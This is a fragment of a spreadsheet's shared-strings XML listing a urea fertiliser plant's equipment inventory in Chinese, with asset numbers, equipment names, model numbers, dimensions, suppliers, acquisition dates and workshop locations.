  <si>
    <t>01208</t>
  </si>
  <si>
    <t>保温泵</t>
  </si>
  <si>
    <t>RB80-50-250</t>
  </si>
  <si>
    <t>01209</t>
  </si>
  <si>
    <t>01210</t>
  </si>
  <si>
    <t>IH65-40-200</t>
  </si>
  <si>
    <t>01211</t>
  </si>
  <si>
    <t>化工泵</t>
  </si>
  <si>
    <t>40FB-65-1</t>
  </si>
  <si>
    <t>01212</t>
  </si>
  <si>
    <t>HBR1.3</t>
  </si>
  <si>
    <t>01213</t>
  </si>
  <si>
    <t>01225</t>
  </si>
  <si>
    <t>￠1400尿塔塔盘</t>
  </si>
  <si>
    <t>φ1400</t>
  </si>
  <si>
    <t>2007.04.30</t>
  </si>
  <si>
    <t>尿塔内 31层</t>
  </si>
  <si>
    <t>01226</t>
  </si>
  <si>
    <t>01227</t>
  </si>
  <si>
    <t>￠1600一分塔塔盘</t>
  </si>
  <si>
    <t>φ1600</t>
  </si>
  <si>
    <t>一分塔内  6层</t>
  </si>
  <si>
    <t>01228</t>
  </si>
  <si>
    <t>￠1300二分塔塔盘</t>
  </si>
  <si>
    <t>φ1300</t>
  </si>
  <si>
    <t>01229</t>
  </si>
  <si>
    <t>￠1400一吸塔塔盘</t>
  </si>
  <si>
    <t>01230</t>
  </si>
  <si>
    <t>￠1600一吸塔塔盘</t>
  </si>
  <si>
    <t>01231</t>
  </si>
  <si>
    <t>一分塔隔液膜器</t>
  </si>
  <si>
    <t>01232</t>
  </si>
  <si>
    <t>二分塔隔液膜器</t>
  </si>
  <si>
    <t>01233</t>
  </si>
  <si>
    <t>闪蒸器隔液膜器</t>
  </si>
  <si>
    <t>01234</t>
  </si>
  <si>
    <t>一分塔定位格栅</t>
  </si>
  <si>
    <t>01235</t>
  </si>
  <si>
    <t>二分塔定位格栅</t>
  </si>
  <si>
    <t>01236</t>
  </si>
  <si>
    <t>二分塔液膜器</t>
  </si>
  <si>
    <t>01268</t>
  </si>
  <si>
    <t>F=194.5m2</t>
  </si>
  <si>
    <t>2007.11.17</t>
  </si>
  <si>
    <t>01296</t>
  </si>
  <si>
    <t>2循1冷分离器</t>
  </si>
  <si>
    <t>2007.12.27</t>
  </si>
  <si>
    <t>01304</t>
  </si>
  <si>
    <t>01306</t>
  </si>
  <si>
    <t>尿素粉尘回收填料</t>
  </si>
  <si>
    <t>DN100pg2.5</t>
  </si>
  <si>
    <t>批</t>
  </si>
  <si>
    <t>01324</t>
  </si>
  <si>
    <t>水力抽真空泵</t>
  </si>
  <si>
    <t>YNB125-100-250</t>
  </si>
  <si>
    <t>2008.02.28</t>
  </si>
  <si>
    <t>01350</t>
  </si>
  <si>
    <t>1.2段蒸发冷凝器</t>
  </si>
  <si>
    <t>F=284m2 F=350m2</t>
  </si>
  <si>
    <t>2008.04.25</t>
  </si>
  <si>
    <t>01351</t>
  </si>
  <si>
    <t>蒸汽冷凝液槽*3600</t>
  </si>
  <si>
    <t>V=33.7m3</t>
  </si>
  <si>
    <t>01352</t>
  </si>
  <si>
    <t>洗涤槽*1500</t>
  </si>
  <si>
    <t>V=5.63m3</t>
  </si>
  <si>
    <t>01353</t>
  </si>
  <si>
    <t>喷射循环*3000</t>
  </si>
  <si>
    <t>V=22.6m3</t>
  </si>
  <si>
    <t>01483</t>
  </si>
  <si>
    <t>20万吨尿素外网</t>
  </si>
  <si>
    <t>2008.12.28</t>
  </si>
  <si>
    <t>01134</t>
  </si>
  <si>
    <t>蒸发喷射器一、二段</t>
  </si>
  <si>
    <t>20V-Ⅰ-Ⅱ</t>
  </si>
  <si>
    <t>20万吨</t>
  </si>
  <si>
    <t>01135</t>
  </si>
  <si>
    <t>KQL2000/3000-45/42</t>
  </si>
  <si>
    <t>01136</t>
  </si>
  <si>
    <t>KQWH100-250</t>
  </si>
  <si>
    <t>01137</t>
  </si>
  <si>
    <t>钛材二段分离器</t>
  </si>
  <si>
    <t>φ2200×6115×12</t>
  </si>
  <si>
    <t>01138</t>
  </si>
  <si>
    <t>二段蒸发加热器钛材</t>
  </si>
  <si>
    <t>φ500×2547×10</t>
  </si>
  <si>
    <t>01139</t>
  </si>
  <si>
    <t>F=61.05m2</t>
  </si>
  <si>
    <t>01140</t>
  </si>
  <si>
    <t>3JA-9/215</t>
  </si>
  <si>
    <t>01356</t>
  </si>
  <si>
    <t>冲洗水泵</t>
  </si>
  <si>
    <t>3D-2Y3/25</t>
  </si>
  <si>
    <t>2008.04.28</t>
  </si>
  <si>
    <t>01368</t>
  </si>
  <si>
    <t>3YA-30/22-TB</t>
  </si>
  <si>
    <t>2008.05.21</t>
  </si>
  <si>
    <t>01369</t>
  </si>
  <si>
    <t>甲氨泵</t>
  </si>
  <si>
    <t>3JA-19/22-TB</t>
  </si>
  <si>
    <t>01468</t>
  </si>
  <si>
    <t>25t/h尿素解析废液设备</t>
  </si>
  <si>
    <t>25t/h</t>
  </si>
  <si>
    <t>2008.10.21</t>
  </si>
  <si>
    <t>01385</t>
  </si>
  <si>
    <t>程控阀</t>
  </si>
  <si>
    <t>2008.06.16</t>
  </si>
  <si>
    <t>20万吨(3楼)</t>
  </si>
  <si>
    <t>01129</t>
  </si>
  <si>
    <t>20万吨泵房</t>
  </si>
  <si>
    <t>01130</t>
  </si>
  <si>
    <t>01141</t>
  </si>
  <si>
    <t>01142</t>
  </si>
  <si>
    <t>冲洗泵</t>
  </si>
  <si>
    <t>01147</t>
  </si>
  <si>
    <t>解析泵</t>
  </si>
  <si>
    <t>2007.01.17</t>
  </si>
  <si>
    <t>01152</t>
  </si>
  <si>
    <t>HY06-ERFENT130</t>
  </si>
  <si>
    <t>20万吨框架</t>
  </si>
  <si>
    <t>01153</t>
  </si>
  <si>
    <t>液氨缓冲罐</t>
  </si>
  <si>
    <t>HY05-YAHCG1300</t>
  </si>
  <si>
    <t>01154</t>
  </si>
  <si>
    <t>液位槽</t>
  </si>
  <si>
    <t>HY05-YWC800</t>
  </si>
  <si>
    <t>01155</t>
  </si>
  <si>
    <t>HY05-YWC500</t>
  </si>
  <si>
    <t>01161</t>
  </si>
  <si>
    <t>降膜式闪蒸器</t>
  </si>
  <si>
    <t>φ1800/φ1000</t>
  </si>
  <si>
    <t>2007.02.01</t>
  </si>
  <si>
    <t>01162</t>
  </si>
  <si>
    <t>精洗器</t>
  </si>
  <si>
    <t>01163</t>
  </si>
  <si>
    <t>F=90.7m2</t>
  </si>
  <si>
    <t>01164</t>
  </si>
  <si>
    <t>内菱形蒸发洗涤器</t>
  </si>
  <si>
    <t>V=5.9m3</t>
  </si>
  <si>
    <t>01165</t>
  </si>
  <si>
    <t>真空泵</t>
  </si>
  <si>
    <t>2BE3-50</t>
  </si>
  <si>
    <t>01168</t>
  </si>
  <si>
    <t>循环第二冷凝器</t>
  </si>
  <si>
    <t>F=188m2</t>
  </si>
  <si>
    <t>01169</t>
  </si>
  <si>
    <t>循环第一冷凝器</t>
  </si>
  <si>
    <t>01170</t>
  </si>
  <si>
    <t>氨冷AB</t>
  </si>
  <si>
    <t>F=580m2</t>
  </si>
  <si>
    <t>01171</t>
  </si>
  <si>
    <t>二段蒸发冷凝器</t>
  </si>
  <si>
    <t>F=350m2</t>
  </si>
  <si>
    <t>01172</t>
  </si>
  <si>
    <t>01173</t>
  </si>
  <si>
    <t>闪蒸冷凝器</t>
  </si>
  <si>
    <t>F=185m2</t>
  </si>
  <si>
    <t>01174</t>
  </si>
  <si>
    <t>F=423.8m2</t>
  </si>
  <si>
    <t>01175</t>
  </si>
  <si>
    <t>解吸塔</t>
  </si>
  <si>
    <t>V=25.7m3</t>
  </si>
  <si>
    <t>01176</t>
  </si>
  <si>
    <t>一段蒸发冷凝器</t>
  </si>
  <si>
    <t>F=284m2</t>
  </si>
  <si>
    <t>01189</t>
  </si>
  <si>
    <t>中间冷凝器</t>
  </si>
  <si>
    <t>DN600</t>
  </si>
  <si>
    <t>01190</t>
  </si>
  <si>
    <t>DN1000</t>
  </si>
  <si>
    <t>01191</t>
  </si>
  <si>
    <t>二甲液预热器</t>
  </si>
  <si>
    <t>01192</t>
  </si>
  <si>
    <t>DN800</t>
  </si>
  <si>
    <t>01131</t>
  </si>
  <si>
    <t>水抽真空循环泵</t>
  </si>
  <si>
    <t>YNB125-100-25</t>
  </si>
  <si>
    <t>20万吨框架二楼</t>
  </si>
  <si>
    <t>01132</t>
  </si>
  <si>
    <t>双吸融熔泵</t>
  </si>
  <si>
    <t>JFRB65-40-315</t>
  </si>
  <si>
    <t>01415</t>
  </si>
  <si>
    <t>带式输送机</t>
  </si>
  <si>
    <t>B600</t>
  </si>
  <si>
    <t>2008.07.18</t>
  </si>
  <si>
    <t>20万吨尿素</t>
  </si>
  <si>
    <t>02025</t>
  </si>
  <si>
    <t>650T/d</t>
  </si>
  <si>
    <t>2014.01.25</t>
  </si>
  <si>
    <t>20万吨尿素车间造粒岗位</t>
  </si>
  <si>
    <t>01980</t>
  </si>
  <si>
    <t>650T</t>
  </si>
  <si>
    <t>20万吨尿素造粒岗位</t>
  </si>
  <si>
    <t>01148</t>
  </si>
  <si>
    <t>一分塔</t>
  </si>
  <si>
    <t>HY-05-YAYRQ</t>
  </si>
  <si>
    <t>20万吨一楼</t>
  </si>
  <si>
    <t>01149</t>
  </si>
  <si>
    <t>液氨预热器</t>
  </si>
  <si>
    <t>HY05-YAYRQ</t>
  </si>
  <si>
    <t>01150</t>
  </si>
  <si>
    <t>蒸汽膨胀槽</t>
  </si>
  <si>
    <t>J1-11823-1</t>
  </si>
  <si>
    <t>01151</t>
  </si>
  <si>
    <t>WH05-QSFLQ(B)</t>
  </si>
  <si>
    <t>01243</t>
  </si>
  <si>
    <t>￠1400</t>
  </si>
  <si>
    <t>2007.05.31</t>
  </si>
  <si>
    <t>01348</t>
  </si>
  <si>
    <t>尿液槽*3600</t>
  </si>
  <si>
    <t>φ3600×6600</t>
  </si>
  <si>
    <t>20万吨一楼外</t>
  </si>
  <si>
    <t>01522</t>
  </si>
  <si>
    <t>一吸塔鼓泡分布器</t>
  </si>
  <si>
    <t>DN1600</t>
  </si>
  <si>
    <t>2009.09.27</t>
  </si>
  <si>
    <t>20万吨一吸塔</t>
  </si>
  <si>
    <t>01349</t>
  </si>
  <si>
    <t>碳铵液槽*6000</t>
  </si>
  <si>
    <t>φ6000×7162</t>
  </si>
  <si>
    <t>20万一楼外</t>
  </si>
  <si>
    <t>01312</t>
  </si>
  <si>
    <t>尿素造粒塔粉尘回收装置</t>
  </si>
  <si>
    <t>DN100</t>
  </si>
  <si>
    <t>2008.01.24</t>
  </si>
  <si>
    <t>20万造粒塔</t>
  </si>
  <si>
    <t>01482</t>
  </si>
  <si>
    <t>φ1000分解塔</t>
  </si>
  <si>
    <t>尿素车间20万</t>
  </si>
  <si>
    <t>01637</t>
  </si>
  <si>
    <t>冷却塔淋水装置</t>
  </si>
  <si>
    <t>QTFN2000型</t>
  </si>
  <si>
    <t>2011.05.24</t>
  </si>
  <si>
    <t>尿素车间20万吨尿素岗位  新循环水</t>
  </si>
  <si>
    <t>01677</t>
  </si>
  <si>
    <t>2011.07.23</t>
  </si>
  <si>
    <t>尿素车间20万吨尿素岗位 新框架四楼</t>
  </si>
  <si>
    <t>02047</t>
  </si>
  <si>
    <t>600/T</t>
  </si>
  <si>
    <t>2014.08.25</t>
  </si>
  <si>
    <t>尿素车间20万吨尿素装置</t>
  </si>
  <si>
    <t>01599</t>
  </si>
  <si>
    <t>350/d</t>
  </si>
  <si>
    <t>20吨'新造粒机</t>
  </si>
  <si>
    <t>01600</t>
  </si>
  <si>
    <t>650/d</t>
  </si>
  <si>
    <t>蒸发冷凝液槽</t>
  </si>
  <si>
    <t>3000*4517*8   2714立方</t>
  </si>
  <si>
    <t>密封水槽</t>
  </si>
  <si>
    <t>1.5*1.5</t>
  </si>
  <si>
    <t>单梁起重机</t>
  </si>
  <si>
    <t>5T</t>
  </si>
  <si>
    <t>液氨过滤器</t>
  </si>
  <si>
    <t>0.18立方 TB150</t>
  </si>
  <si>
    <t>新方</t>
  </si>
  <si>
    <t>液氨除油罐</t>
  </si>
  <si>
    <t>1020*2800  2.85立方</t>
  </si>
  <si>
    <t>上水泵</t>
  </si>
  <si>
    <t>80KQDL/J20*6</t>
  </si>
  <si>
    <t>上海凯泉</t>
  </si>
  <si>
    <t>中间喷射器（蒸汽）</t>
  </si>
  <si>
    <t>闪蒸液槽</t>
  </si>
  <si>
    <t>粉尘回收泵（离心泵单级）</t>
  </si>
  <si>
    <t>KQWH100-200B</t>
  </si>
  <si>
    <t>凯泉</t>
  </si>
  <si>
    <t>分离器（不锈钢）</t>
  </si>
  <si>
    <t>0.28立方</t>
  </si>
  <si>
    <t>盐城</t>
  </si>
  <si>
    <t>QSN500-M2/470</t>
  </si>
  <si>
    <t>尿素车间50压缩</t>
  </si>
  <si>
    <t>电动吊钩桥式起重机</t>
  </si>
  <si>
    <t>10T双梁</t>
  </si>
  <si>
    <t>新乡起重设备厂</t>
  </si>
  <si>
    <t>50压缩</t>
  </si>
  <si>
    <t>01612</t>
  </si>
  <si>
    <t>不锈钢焊板式冷却器</t>
  </si>
  <si>
    <t>DW9S-160</t>
  </si>
  <si>
    <t>2010.09.26</t>
  </si>
  <si>
    <t>2#50压缩机油冷</t>
  </si>
  <si>
    <t>02058</t>
  </si>
  <si>
    <t>BRO.23-25</t>
  </si>
  <si>
    <t>CO2压缩岗位</t>
  </si>
  <si>
    <t>02074</t>
  </si>
  <si>
    <t>缓冲器</t>
  </si>
  <si>
    <t>2016.01.21</t>
  </si>
  <si>
    <t>Co2压缩岗位</t>
  </si>
  <si>
    <t>01914</t>
  </si>
  <si>
    <t>15m2板式冷却器</t>
  </si>
  <si>
    <t>15m2</t>
  </si>
  <si>
    <t>2012.05.26</t>
  </si>
  <si>
    <t>尿素车间二氧化碳50压缩岗位</t>
  </si>
  <si>
    <t>二氧化碳压缩机</t>
  </si>
  <si>
    <t>4M12（9）-49/210</t>
  </si>
  <si>
    <t>沈阳压缩机厂</t>
  </si>
  <si>
    <t>一入分离器</t>
  </si>
  <si>
    <t>辽阳</t>
  </si>
  <si>
    <t>活性炭脱硫槽</t>
  </si>
  <si>
    <t>10立方  2.2*6</t>
  </si>
  <si>
    <t>1*5</t>
  </si>
  <si>
    <t>稀油站</t>
  </si>
  <si>
    <t>2*1*1.5</t>
  </si>
  <si>
    <t>一段冷却器</t>
  </si>
  <si>
    <t>液态分离器</t>
  </si>
  <si>
    <t>二段冷却器</t>
  </si>
  <si>
    <t>三段分离器</t>
  </si>
  <si>
    <t>一段缓冲器</t>
  </si>
  <si>
    <t>二段缓冲器</t>
  </si>
  <si>
    <t>二段分离器</t>
  </si>
  <si>
    <t>三段冷却器</t>
  </si>
  <si>
    <t>三段缓冲器</t>
  </si>
  <si>
    <t>四段冷却器</t>
  </si>
  <si>
    <t>四段分离器</t>
  </si>
  <si>
    <t>平衡段分离器</t>
  </si>
  <si>
    <t>四段进口缓冲</t>
  </si>
  <si>
    <t>四段出口缓冲</t>
  </si>
  <si>
    <t>五段进口缓冲</t>
  </si>
  <si>
    <t>五段出口缓冲</t>
  </si>
  <si>
    <t>尿素车间65压缩</t>
  </si>
  <si>
    <t>00282</t>
  </si>
  <si>
    <t>双桥式起重机</t>
  </si>
  <si>
    <t>12.5t</t>
  </si>
  <si>
    <t>CO2  65机</t>
  </si>
  <si>
    <t>00948</t>
  </si>
  <si>
    <t>四级冷却器</t>
  </si>
  <si>
    <t>CO2 65机</t>
  </si>
  <si>
    <t>00949</t>
  </si>
  <si>
    <t>冷却器</t>
  </si>
  <si>
    <t>00648</t>
  </si>
  <si>
    <t>CO2压缩机</t>
  </si>
  <si>
    <t>4M12-65/210</t>
  </si>
  <si>
    <t>2003.11.28</t>
  </si>
  <si>
    <t>65压缩</t>
  </si>
  <si>
    <t>一段出口分离器</t>
  </si>
  <si>
    <t>一段分离器</t>
  </si>
  <si>
    <t>二段出口分离器</t>
  </si>
  <si>
    <t>二入缓冲罐</t>
  </si>
  <si>
    <t>液汽分离器</t>
  </si>
  <si>
    <t>三段出口分离器</t>
  </si>
  <si>
    <t>三入缓冲罐</t>
  </si>
  <si>
    <t>四段出口分离器</t>
  </si>
  <si>
    <t>脱硫槽</t>
  </si>
  <si>
    <t>河北化技</t>
  </si>
  <si>
    <t>石家庄天人</t>
  </si>
  <si>
    <t>尿素车间85压缩</t>
  </si>
  <si>
    <t>00950</t>
  </si>
  <si>
    <t>脱硫过滤器</t>
  </si>
  <si>
    <t>φ2200×8200</t>
  </si>
  <si>
    <t>85 CO2机 厂房西侧</t>
  </si>
  <si>
    <t>01244</t>
  </si>
  <si>
    <t>22m3</t>
  </si>
  <si>
    <t>85压缩</t>
  </si>
  <si>
    <t>01157</t>
  </si>
  <si>
    <t>M-85/220</t>
  </si>
  <si>
    <t>2007.01.20</t>
  </si>
  <si>
    <t>CO2 85岗位</t>
  </si>
  <si>
    <t>进口分离器</t>
  </si>
  <si>
    <t>2800*8418</t>
  </si>
  <si>
    <t>德州</t>
  </si>
  <si>
    <t>1.8*6</t>
  </si>
  <si>
    <t>藁城</t>
  </si>
  <si>
    <t>平衡段缓冲罐</t>
  </si>
  <si>
    <t>一段进口缓冲</t>
  </si>
  <si>
    <t>二段进口缓冲</t>
  </si>
  <si>
    <t>三段进口缓冲</t>
  </si>
  <si>
    <t>四段缓冲器</t>
  </si>
  <si>
    <t>五段缓冲器</t>
  </si>
  <si>
    <t>五段分离器</t>
  </si>
  <si>
    <t>尿素车间NHD</t>
  </si>
  <si>
    <t>00283</t>
  </si>
  <si>
    <t>液滴分离器</t>
  </si>
  <si>
    <t>f1400h2800</t>
  </si>
  <si>
    <t>NHD</t>
  </si>
  <si>
    <t>00284</t>
  </si>
  <si>
    <t>地下罐</t>
  </si>
  <si>
    <t>00285</t>
  </si>
  <si>
    <t>空气过滤器</t>
  </si>
  <si>
    <t>00288</t>
  </si>
  <si>
    <t>进塔器分离器</t>
  </si>
  <si>
    <t>3.1立方米</t>
  </si>
  <si>
    <t>00289</t>
  </si>
  <si>
    <t>高压闪蒸槽</t>
  </si>
  <si>
    <t>34立方</t>
  </si>
  <si>
    <t>00290</t>
  </si>
  <si>
    <t>co2分离器</t>
  </si>
  <si>
    <t>5立方</t>
  </si>
  <si>
    <t>00291</t>
  </si>
  <si>
    <t>进塔气分离器</t>
  </si>
  <si>
    <t>3立方米</t>
  </si>
  <si>
    <t>00292</t>
  </si>
  <si>
    <t>低压闪蒸槽</t>
  </si>
  <si>
    <t>00293</t>
  </si>
  <si>
    <t>气提塔</t>
  </si>
  <si>
    <t>DN1600/DN2200*50606</t>
  </si>
  <si>
    <t>00294</t>
  </si>
  <si>
    <t>脱碳泵</t>
  </si>
  <si>
    <t>200d-65</t>
  </si>
  <si>
    <t>00295</t>
  </si>
  <si>
    <t>净化气分离器</t>
  </si>
  <si>
    <t>bh900</t>
  </si>
  <si>
    <t>00296</t>
  </si>
  <si>
    <t>非标散热气</t>
  </si>
  <si>
    <t>uzgl</t>
  </si>
  <si>
    <t>00297</t>
  </si>
  <si>
    <t>脱碳塔</t>
  </si>
  <si>
    <t>φ1800*49234</t>
  </si>
  <si>
    <t>00300</t>
  </si>
  <si>
    <t>脱硫塔</t>
  </si>
  <si>
    <t>VN58.4立方米</t>
  </si>
  <si>
    <t>00302</t>
  </si>
  <si>
    <t>脱碳钢结构</t>
  </si>
  <si>
    <t>00569</t>
  </si>
  <si>
    <t>氨冷器</t>
  </si>
  <si>
    <t>450 m2</t>
  </si>
  <si>
    <t>德州化工机械</t>
  </si>
  <si>
    <t>2003.08.21</t>
  </si>
  <si>
    <t>00580</t>
  </si>
  <si>
    <t>BRG-85</t>
  </si>
  <si>
    <t>2003.08.24</t>
  </si>
  <si>
    <t>00614</t>
  </si>
  <si>
    <t>空气冷却器</t>
  </si>
  <si>
    <t>350平米</t>
  </si>
  <si>
    <t>2003.08.29</t>
  </si>
  <si>
    <t>00702</t>
  </si>
  <si>
    <t>地槽</t>
  </si>
  <si>
    <t>2003.12.30</t>
  </si>
  <si>
    <t>00721</t>
  </si>
  <si>
    <t>BR0.2-C</t>
  </si>
  <si>
    <t>2004.04.26</t>
  </si>
  <si>
    <t>00742</t>
  </si>
  <si>
    <t>贫液泵</t>
  </si>
  <si>
    <t>200D-65*9</t>
  </si>
  <si>
    <t>2004.06.29</t>
  </si>
  <si>
    <t>00743</t>
  </si>
  <si>
    <t>单泵</t>
  </si>
  <si>
    <t>250S-6A</t>
  </si>
  <si>
    <t>00751</t>
  </si>
  <si>
    <t>多级泵</t>
  </si>
  <si>
    <t>2004.08.31</t>
  </si>
  <si>
    <t>01344</t>
  </si>
  <si>
    <t>变换气脱硫槽</t>
  </si>
  <si>
    <t>φ2400×15920</t>
  </si>
  <si>
    <t>2008.03.17</t>
  </si>
  <si>
    <t>离心式鼓风机</t>
  </si>
  <si>
    <t>C150-1.4</t>
  </si>
  <si>
    <t>陕西鼓风机厂</t>
  </si>
  <si>
    <t>富液泵</t>
  </si>
  <si>
    <t>200D-43*2</t>
  </si>
  <si>
    <t>凯士比泵</t>
  </si>
  <si>
    <t>NHD脱水系统</t>
  </si>
  <si>
    <t>NHD溶剂储槽</t>
  </si>
  <si>
    <t>新尿素包装岗位</t>
  </si>
  <si>
    <t>01570</t>
  </si>
  <si>
    <t>减速器</t>
  </si>
  <si>
    <t>ZSYS355-25-IYA</t>
  </si>
  <si>
    <t>2010.05.25</t>
  </si>
  <si>
    <t>包装</t>
  </si>
  <si>
    <t>00817</t>
  </si>
  <si>
    <t>移动式皮带机</t>
  </si>
  <si>
    <t>B800*14M</t>
  </si>
  <si>
    <t>2005.02.28</t>
  </si>
  <si>
    <t>包装岗位</t>
  </si>
  <si>
    <t>01215</t>
  </si>
  <si>
    <t>自动定量包装秤</t>
  </si>
  <si>
    <t>LCS-50</t>
  </si>
  <si>
    <t>01693</t>
  </si>
  <si>
    <t>大袋定量包装系统</t>
  </si>
  <si>
    <t>LCS-1000-DL</t>
  </si>
  <si>
    <t>2011.11.26</t>
  </si>
  <si>
    <t>尿素车间包装岗位</t>
  </si>
  <si>
    <t>01462</t>
  </si>
  <si>
    <t>计量泵</t>
  </si>
  <si>
    <t>LCS50</t>
  </si>
  <si>
    <t>2008.09.27</t>
  </si>
  <si>
    <t>新包装</t>
  </si>
  <si>
    <t>尿素料仓</t>
  </si>
  <si>
    <t>4*4.5*5</t>
  </si>
  <si>
    <t>尿素车间北PSA</t>
  </si>
  <si>
    <t>00792</t>
  </si>
  <si>
    <t>气水分离罐</t>
  </si>
  <si>
    <t>φ1400×6674</t>
  </si>
  <si>
    <t>2005.01.31</t>
  </si>
  <si>
    <t>北PSA</t>
  </si>
  <si>
    <t>00793</t>
  </si>
  <si>
    <t>CO2缓冲罐</t>
  </si>
  <si>
    <t>φ2600×12900</t>
  </si>
  <si>
    <t>00794</t>
  </si>
  <si>
    <t>CO2中间罐</t>
  </si>
  <si>
    <t>φ2600×20400</t>
  </si>
  <si>
    <t>00795</t>
  </si>
  <si>
    <t>混合气罐</t>
  </si>
  <si>
    <t>φ2000×11333</t>
  </si>
  <si>
    <t>00838</t>
  </si>
  <si>
    <t>吸附塔</t>
  </si>
  <si>
    <t>2000*14*8992</t>
  </si>
  <si>
    <t>2005.05.13</t>
  </si>
  <si>
    <t>00914</t>
  </si>
  <si>
    <t>三出分离器</t>
  </si>
  <si>
    <t>00499</t>
  </si>
  <si>
    <t>PSA</t>
  </si>
  <si>
    <t>02073</t>
  </si>
  <si>
    <t>消音器制作</t>
  </si>
  <si>
    <t>变压吸附岗位</t>
  </si>
  <si>
    <t>02033</t>
  </si>
  <si>
    <t>变压吸附控制系统网络改造服务费</t>
  </si>
  <si>
    <t>S7-300</t>
  </si>
  <si>
    <t>2014.05.25</t>
  </si>
  <si>
    <t>尿素车间   变压吸附岗位</t>
  </si>
  <si>
    <t>00839</t>
  </si>
  <si>
    <t>2000*14*6792</t>
  </si>
  <si>
    <t>邯郸制氧机厂</t>
  </si>
  <si>
    <t>焦炭过滤器</t>
  </si>
  <si>
    <t>2600*6250*20</t>
  </si>
  <si>
    <t>博山</t>
  </si>
  <si>
    <t>2BE1303-0</t>
  </si>
  <si>
    <t>武汉</t>
  </si>
  <si>
    <t>精脱硫塔</t>
  </si>
  <si>
    <t>2800*12790*24</t>
  </si>
  <si>
    <t>天人</t>
  </si>
  <si>
    <t>2BE3-40</t>
  </si>
  <si>
    <t>程控阀（仪表脱碳）</t>
  </si>
  <si>
    <t>36000立方</t>
  </si>
  <si>
    <t>吸油站（泵站）</t>
  </si>
  <si>
    <t>HXBE-100B</t>
  </si>
  <si>
    <t>尿素车间北二脱</t>
  </si>
  <si>
    <t>00437</t>
  </si>
  <si>
    <t>二脱空压机</t>
  </si>
  <si>
    <t>LW-6/15</t>
  </si>
  <si>
    <t>北二脱</t>
  </si>
  <si>
    <t>00566</t>
  </si>
  <si>
    <t>泡沫泵</t>
  </si>
  <si>
    <t>靖江江利</t>
  </si>
  <si>
    <t>2003.08.19</t>
  </si>
  <si>
    <t>00885</t>
  </si>
  <si>
    <t>00886</t>
  </si>
  <si>
    <t>00913</t>
  </si>
  <si>
    <t>2200</t>
  </si>
  <si>
    <t>00980</t>
  </si>
  <si>
    <t>φ2200×5562</t>
  </si>
  <si>
    <t>2005.12.30</t>
  </si>
  <si>
    <t>01204</t>
  </si>
  <si>
    <t>精脱硫塔(干法槽)</t>
  </si>
  <si>
    <t>￠3600*28*13470</t>
  </si>
  <si>
    <t>01255</t>
  </si>
  <si>
    <t>D720-60*2</t>
  </si>
  <si>
    <t>2007.07.31</t>
  </si>
  <si>
    <t>01531</t>
  </si>
  <si>
    <t>罗茨鼓风机</t>
  </si>
  <si>
    <t>SR-50</t>
  </si>
  <si>
    <t>保定</t>
  </si>
  <si>
    <t>2009.10.26</t>
  </si>
  <si>
    <t>01007</t>
  </si>
  <si>
    <t>砂浆泵</t>
  </si>
  <si>
    <t>11KW</t>
  </si>
  <si>
    <t>2006.02.28</t>
  </si>
  <si>
    <t>二脱</t>
  </si>
  <si>
    <t>01033</t>
  </si>
  <si>
    <t>4800变脱塔</t>
  </si>
  <si>
    <t>φ4800</t>
  </si>
  <si>
    <t>河北化工技术</t>
  </si>
  <si>
    <t>2006.04.30</t>
  </si>
  <si>
    <t>01034</t>
  </si>
  <si>
    <t>液体分布装置</t>
  </si>
  <si>
    <t>干法槽</t>
  </si>
  <si>
    <t>冀州华通</t>
  </si>
  <si>
    <t>热水加热器</t>
  </si>
  <si>
    <t>自制800*9米</t>
  </si>
  <si>
    <t>水泵（热水循环泵）</t>
  </si>
  <si>
    <t>IS100-80/160</t>
  </si>
  <si>
    <t>唐山</t>
  </si>
  <si>
    <t>搅拌机</t>
  </si>
  <si>
    <t>XLD8-71-7.5</t>
  </si>
  <si>
    <t>常州</t>
  </si>
  <si>
    <t>离心泵（制液泵）</t>
  </si>
  <si>
    <t>靖江</t>
  </si>
  <si>
    <t>水泵（一次水接力泵）</t>
  </si>
  <si>
    <t>IS125-100-250</t>
  </si>
  <si>
    <t>尿素车间南PSA</t>
  </si>
  <si>
    <t>00806</t>
  </si>
  <si>
    <t>精脱碳塔</t>
  </si>
  <si>
    <t>VN 70立方米</t>
  </si>
  <si>
    <t>南PSA</t>
  </si>
  <si>
    <t>01179</t>
  </si>
  <si>
    <t>T-101</t>
  </si>
  <si>
    <t>深州</t>
  </si>
  <si>
    <t>2007.02.20</t>
  </si>
  <si>
    <t>01180</t>
  </si>
  <si>
    <t>T-102</t>
  </si>
  <si>
    <t>01181</t>
  </si>
  <si>
    <t>气水分离器</t>
  </si>
  <si>
    <t>φ2200×8156</t>
  </si>
  <si>
    <t>01182</t>
  </si>
  <si>
    <t>逆放气缓冲罐</t>
  </si>
  <si>
    <t>φ3600</t>
  </si>
  <si>
    <t>01183</t>
  </si>
  <si>
    <t>CO2气缓冲罐</t>
  </si>
  <si>
    <t>01184</t>
  </si>
  <si>
    <t>顺放气缓冲罐</t>
  </si>
  <si>
    <t>φ2800</t>
  </si>
  <si>
    <t>深州金属结构</t>
  </si>
  <si>
    <t>01185</t>
  </si>
  <si>
    <t>均压气缓冲罐</t>
  </si>
  <si>
    <t>2800</t>
  </si>
  <si>
    <t>01386</t>
  </si>
  <si>
    <t>01387</t>
  </si>
  <si>
    <t>01424</t>
  </si>
  <si>
    <t>8000脱碳仪表程控阀</t>
  </si>
  <si>
    <t>01485</t>
  </si>
  <si>
    <t>80000立方米脱碳外网</t>
  </si>
  <si>
    <t>02009</t>
  </si>
  <si>
    <t>板式换热器（304）</t>
  </si>
  <si>
    <t>尿素车间南变压吸附岗位</t>
  </si>
  <si>
    <t>换热器</t>
  </si>
  <si>
    <t>1100*6648*12</t>
  </si>
  <si>
    <t>沈阳</t>
  </si>
  <si>
    <t>除油机</t>
  </si>
  <si>
    <t>3500*8250*28</t>
  </si>
  <si>
    <t>河北天德</t>
  </si>
  <si>
    <t>吸油站（液态集成泵站）</t>
  </si>
  <si>
    <t>成都</t>
  </si>
  <si>
    <t>尿素车间南二脱</t>
  </si>
  <si>
    <t>00835</t>
  </si>
  <si>
    <t>硫回收釜</t>
  </si>
  <si>
    <t>900WL</t>
  </si>
  <si>
    <t>南二脱</t>
  </si>
  <si>
    <t>01035</t>
  </si>
  <si>
    <t>6800再生槽</t>
  </si>
  <si>
    <t>φ6800</t>
  </si>
  <si>
    <t>01261</t>
  </si>
  <si>
    <t>水泵</t>
  </si>
  <si>
    <t>KQW65/250-15/2</t>
  </si>
  <si>
    <t>2007.10.30</t>
  </si>
  <si>
    <t>01507</t>
  </si>
  <si>
    <t>耐腐蚀泵</t>
  </si>
  <si>
    <t>2009.06.02</t>
  </si>
